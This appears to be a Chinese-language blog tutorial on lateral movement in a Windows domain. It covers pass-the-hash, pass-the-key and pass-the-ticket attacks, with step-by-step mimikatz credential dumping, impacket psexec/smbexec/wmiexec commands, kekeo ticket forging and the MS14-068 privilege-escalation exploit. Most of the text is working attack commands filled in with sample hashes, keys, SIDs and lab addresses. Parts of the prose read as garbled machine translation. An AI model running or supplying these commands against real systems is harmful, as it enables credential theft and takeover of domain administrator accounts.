Mimikatz本文将使用的命令
privilege::debug #提升权限 sekurlsa::logonpasswords #抓取密码信息 sekurlsa::msv #抓取LM、NTLM、值 sekurlsa::ekeys #抓取aes值 哈希传递攻击(PTH)
简介:
哈希传递(Pass The Hash)该方法通过找到与账户相关的密码散列值进行攻击Windows Server 2012 R2之前使用到的密码散列值是LM、NTLM,在Windows Server 2012 R2 版本后使用的密码散列值是NTLM Hash。
在域环境中,用户在登录计算机时可能会使用域账户,许多计算机在安装时会使用相同的本地管理员账户密码。因此,如果计算机的本地管理员账户与密码相同,攻击者可以使用哈希传输攻击的方法登录内网中的其他计算机。
条件:
有管理员的密码散列值,目标机器打开445端口(SMB服务)。
进行攻击:
1.使用mimikatz哈希传递攻击:
使用mimikatz除了域内主机,还获得了域名和域用户名。ip地址
sekurlsa::msv 
在mimikatz运行以下命令
sekurlsa::pth /user:域用户名 /domain:域名 /ntlm:域用户名的NTLM值 sekurlsa::pth /user:administrator /domain:god /ntlm:8c535a2d84c3b21059d667639bb89db5 操作完成后,你会跳一个cmd窗户,然后跳出来cmd在任何域内连接窗口ip地址进行连接
net use \\192.168.52.138 #建立IPC连接 dir \\192.168.52.138\c$ #查看连接域ipc盘文件夹 使用mimikazt有一个缺点是需要建立IPC除使用外,连接mimikatz除了哈希传递攻击,我们还可以使用其他工具进行哈希传递攻击。以下演示impacket工具包中的两种工具,请注意,该工具包中的工具可以使用哈希,如果使用微软官方,Pstools工具包的工具只能用明文使用。impacket工具包下载地址:https://github.com/SecureAuthCorp/impacket
2.使用psexec哈希传递攻击:
使用psexec哈希传递攻击所需的参数和mimikatz哈希传输攻击的参数与域名、域用户名、域主机相同ip地址
psexec.exe -hashes :NTLM值 域名/域用户@域内ip地址 psexec.exe -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138 哈希传递攻击的优点是不需要建立IPC连接。
3.使用smbexec哈希传递攻击:
smbexec.exe -hashes :NTLM值 域名/域用户@域内ip地址 smbexec.exe -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138 以上三种哈希传输攻击均采用445端口(SMB服务)不使用135端口,然后演示445端口配合135端口进行哈希传输攻击
4.使用wmiexec哈希传递攻击:
缺点是一次只能执行一次命令,上述三个命令可以执行多次。
wmiexec -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138 "ipconfig" 哈希传递攻击时应注意以下两点:
- dir命令后使用主机名,不能使用IP,否则报错
- 使用mimikatz哈希传递需要当地管理员的权限
传输攻击的密钥(PTK)
简介:
密钥传输攻击只能被击中
条件:
打了任何用户都可以连接补丁 aes256 连接。
进行攻击:
mimikatz获取aes值
sekurlsa::ekeys sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值 hash sekurlsa::pth /user:administrator /domain:god /aes256:bd25b5ae78c10e3fcda9693cd31027d70383063a1d8c2b835c6fa1c416b79669 在实际上,PTK传递比PTH传递用的少,因为PTK传递需要一个前提条件,需要域控安装KB2871997补丁的Win7/2008r2/8/2012(2019尝试也可以,并没有装补丁)。
票据传递攻击(PTT)
简介:
不需要管理员权限就可以获得远程系统的访问权限,Pass The Ticket 票据传递(PTT攻击)实现「」访问。
条件:
无
进行攻击:
1.使用mimikatz进行票据传递攻击:
因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗。
缺点:票据是有有效期的,一般为10小时,所以如果当前主机10h之内连接过域控的话,我们可以利用该票据,但是如果超过10h,就没法利用了。
导入票据
sekurlsa::tickets /export
删除票据,排除干扰
klist purge
导入票据
kerberos::ptt 票据文件
kerberos::pttC:\Users\Administrator\Desktop\mimikatz_trunk\x64\[0;3e7]-2-0-60a00000-STU1$@krbtgt-GOD.ORG.kirbi
进行利用
dir \\192.168.52.138\c$
下面的两种方式由于靶机发生故障了,所以借用网上的图片。
2.利用工具kekeo
生成票据,导入票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c" //生成票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi //导入票据
查看凭证 klist
利用
dir \192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$
3.利用漏洞ms14-068
whoami/user 查看当前sid
我们知道mary就是域内一个普通用户
清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
klist //查看凭证列表
klist purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
利用MS14-068生成TGT数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
将票据注入到内存中
./mimikatz.exe
kerberos::ptc TGT_mary@god.org.ccache
exit
查看凭证列表。klist 查看一下,注入成功。
利用
dir \192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$
总结
PTH和PTK需要管理员权限,其中PTK要求更为苛刻,PTK需要打了kb2871997补丁才能够使用,因此一般情况下不考虑使用PTK。而PTT利用漏洞MS14-068可以直接从普通域成员提权到域管理员权限。因此一般应该靠考虑使用MS14-068进行横向移动。